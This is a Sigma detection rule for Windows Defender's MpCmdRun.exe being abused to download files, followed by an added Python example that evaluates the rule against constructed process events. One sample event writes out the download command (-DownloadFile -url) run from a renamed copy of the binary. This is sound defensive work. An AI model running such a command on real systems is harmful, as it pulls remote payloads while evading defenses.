File Download Via Windows Defender MpCmpRun.EXE
Detects the use of Windows Defender MpCmdRun.EXE to download files
Sigma rule

```yaml
title: File Download Via Windows Defender MpCmpRun.EXE
id: 46123129-1024-423e-9fae-43af4a0fa9a5
status: test
description: Detects the use of Windows Defender MpCmdRun.EXE to download files
references:
    - https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866
    - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
author: Matthew Matchen
date: 2020-09-04
modified: 2023-11-09
tags:
    - attack.defense-evasion
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - OriginalFileName: 'MpCmdRun.exe'
        - Image|endswith: '\MpCmdRun.exe'
        - CommandLine|contains: 'MpCmdRun.exe'
        - Description: 'Microsoft Malware Protection Command Line Utility'
    selection_cli:
        CommandLine|contains|all:
            - 'DownloadFile'
            - 'url'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
```
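As an added example (not part of the SigmaHQ rule or this page), the Python below re-implements the rule's selection logic by hand, using Sigma's case-insensitive string semantics, and runs it over three constructed process_creation events: a routine signature update, a download invocation from a renamed copy of the binary (caught through `OriginalFileName`), and an unrelated process whose command line merely contains "url". Event fields and values are constructed for illustration.

```python
"""Evaluate the MpCmdRun download Sigma rule against process_creation events.

Added example: hand-written re-implementation of the rule's selections.
Sigma string modifiers compare case-insensitively, so every field is lowered.
"""


def _norm(value):
    return (value or "").lower()


def selection_img(event: dict) -> bool:
    # A list of maps in Sigma is OR-ed: any one entry satisfies the selection.
    return any([
        _norm(event.get("OriginalFileName")) == "mpcmdrun.exe",
        _norm(event.get("Image")).endswith("\\mpcmdrun.exe"),
        "mpcmdrun.exe" in _norm(event.get("CommandLine")),
        _norm(event.get("Description")) == "microsoft malware protection command line utility",
    ])


def selection_cli(event: dict) -> bool:
    # contains|all: every listed substring must appear in CommandLine.
    cmd = _norm(event.get("CommandLine"))
    return all(needle in cmd for needle in ("downloadfile", "url"))


def rule_matches(event: dict) -> bool:
    # condition: all of selection_*  ->  both selections must hold.
    return selection_img(event) and selection_cli(event)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # 0: routine signature update; image matches, command line does not
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -SignatureUpdate',
    },
    {   # 1: download usage from a renamed copy; OriginalFileName still identifies the binary
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": "svc.exe -DownloadFile -url http://example.invalid/f.bin -path C:\\Users\\Public\\f.bin",
    },
    {   # 2: unrelated tool whose command line happens to contain "url"
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -o out.txt https://example.invalid/url",
    },
]


def matching_indexes(events=SAMPLE_EVENTS):
    """Return the indexes of events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(e)]


if __name__ == "__main__":
    for i in matching_indexes():
        print(f"event {i} matches: {SAMPLE_EVENTS[i]['CommandLine']}")
```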
Related rules
- Curl Download And Execute Combination
- Import LDAP Data Interchange Format File Via Ldifde.EXE
- Download from Suspicious Dyndns Hosts
- File Download Via Nscurl - MacOS
- Greenbug Espionage Group Indicators